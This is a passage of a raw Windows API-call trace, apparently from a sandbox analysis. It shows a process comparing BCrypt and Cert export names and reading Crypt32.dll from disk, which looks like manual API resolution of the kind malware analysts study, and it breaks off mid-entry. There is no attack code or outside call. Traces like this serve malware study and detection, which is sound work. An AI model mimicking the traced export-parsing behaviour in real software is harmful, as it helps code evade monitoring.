lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0271.455] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0271.456] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0271.456] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0271.456] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0271.457] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0271.458] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0271.459] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0271.460] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0271.461] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0271.462] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0271.462] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0271.463] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0271.463] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0271.464] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0271.465] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0271.465] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0271.466] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0271.467] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0271.468] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0271.469] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0271.472] GetProcessHeap () returned 0x400000 [0271.472] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c32010 | out: hHeap=0x400000) returned 1 [0271.472] GetProcessHeap () returned 0x400000 [0271.472] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419300 [0271.473] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0271.576] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0271.576] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0271.576] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0271.576] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0271.577] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0271.577] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0271.577] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0271.577] GetProcessHeap () returned 0x400000 [0271.577] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1c30e0) returned 0x3ff8040 [0271.589] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0271.590] ReadFile (in: hFile=0x160, lpBuffer=0x3ff8040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ff8040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0271.723] CloseHandle (hObject=0x160) returned 1 [0271.723] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0271.723] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.723] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0271.724] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0271.724] lstrcmpA (lpString1="CertAddEncodedCTLToStore", 